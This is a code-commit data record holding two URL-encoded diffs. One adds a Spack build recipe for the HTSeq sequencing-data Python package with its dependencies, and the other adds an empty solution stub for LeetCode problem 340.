96476a32e545184908f64aac41b23987255138e2
|
Create new package. (#6623)
|
var/spack/repos/builtin/packages/py-htseq/package.py
|
var/spack/repos/builtin/packages/py-htseq/package.py
|
Python
| 0 |
@@ -0,0 +1,1930 @@
+##############################################################################%0A# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/spack/spack%0A# Please also see the NOTICE and LICENSE files for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0A%0A%0Aclass PyHtseq(PythonPackage):%0A %22%22%22HTSeq is a Python package that provides infrastructure to process%0A data from high-throughput sequencing assays.%22%22%22%0A%0A homepage = %22http://htseq.readthedocs.io/en/release_0.9.1/overview.html%22%0A url = %22https://github.com/simon-anders/htseq/archive/release_0.9.1.tar.gz%22%0A%0A version('0.9.1', '269e7de5d39fc31f609cccd4a4740e61')%0A%0A depends_on('py-setuptools', type='build')%0A depends_on('py-numpy', type=('build', 'run'))%0A depends_on('py-pysam', type=('build', 'run'))%0A depends_on('py-matplotlib', type=('build', 'run'))%0A depends_on('py-cython', type=('build', 'run'))%0A depends_on('swig', type=('build', 'run'))%0A
|
|
5503e1f54298a5b6121e35794d43c6642b3af6e0
|
Add lc0340_longest_substring_with_at_most_k_distinct_characters.py
|
lc0340_longest_substring_with_at_most_k_distinct_characters.py
|
lc0340_longest_substring_with_at_most_k_distinct_characters.py
|
Python
| 0.998744 |
@@ -0,0 +1,703 @@
+%22%22%22Leetcode 340. Longest Substring with At Most K Distinct Characters%0AHard%0A%0AURL: https://leetcode.com/problems/longest-substring-with-at-most-k-distinct-characters/%0A%0AGiven a string, find the length of the longest substring T that contains at most k%0Adistinct characters.%0A%0AExample 1:%0AInput: s = %22eceba%22, k = 2%0AOutput: 3%0AExplanation: T is %22ece%22 which its length is 3.%0A%0AExample 2:%0AInput: s = %22aa%22, k = 1%0AOutput: 2%0AExplanation: T is %22aa%22 which its length is 2.%0A%22%22%22%0A%0A%0Aclass Solution(object):%0A def lengthOfLongestSubstringKDistinct(self, s, k):%0A %22%22%22%0A :type s: str%0A :type k: int%0A :rtype: int%0A %22%22%22%0A pass%0A%0A%0Adef main():%0A pass%0A%0A%0Aif __name__ == '__main__':%0A main()%0A
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.